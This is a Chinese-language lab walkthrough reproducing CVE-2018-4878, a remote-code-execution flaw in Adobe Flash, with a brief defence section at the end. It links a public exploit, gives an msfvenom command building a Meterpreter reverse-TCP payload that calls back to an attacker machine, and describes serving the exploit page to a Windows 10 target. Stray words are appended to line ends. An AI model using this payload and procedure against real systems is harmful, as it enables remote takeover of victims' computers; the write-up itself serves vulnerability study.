Adboe Flash遠程代碼執行_CVE-2018-4878漏洞復現html
1、漏洞描述python
該漏洞可針對windows用戶發起定向攻擊。攻擊者能夠誘導用戶打開包含惡意Flash代碼文件的Microsoft Office文檔、網頁、垃圾電子郵件等。git
2、漏洞影響版本github
Flash Player版本28.0.0.137以及以前的全部版本web
3、漏洞復現環境搭建shell
攻擊機:kali ip:192.168.10.136windows
靶機:win10 ie默認集成flash,沒有升級tcp
4、漏洞復現spa
1.github下載exp, https://github.com/anbai-inc/CVE-2018-4878code
2.修改exp
2.1修改shellcode爲本身生成的反彈鏈接shellcode,首先先生成反彈鏈接shellcode
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.136 lport=8888 -f python >/root/shellcode.txt
2.2用生成的shellcode替換exp中對應的shellcode
2.3修改exp中生成文件保存的路徑
3.運行python腳本,會生成兩個文件, exploit.swf和index.html
4.把exploit.swf和index.html複製到/var/www/html,而後開啓web服務, 此時,Kali Linux上Web服務啓動,而且具有index.html這個頁面。只要靶機啓用flash並訪問了這個頁面,則能夠直接被控制
5.kali 開啓監聽
6.靶機訪問http://192.168.10.136/index.html
7.此時kali端已經獲取到會話
5、漏洞防護
1.下載最新版本的Adobe Flash
2.安裝常見殺毒軟件,開啓實時防禦和殺毒引擎實時升級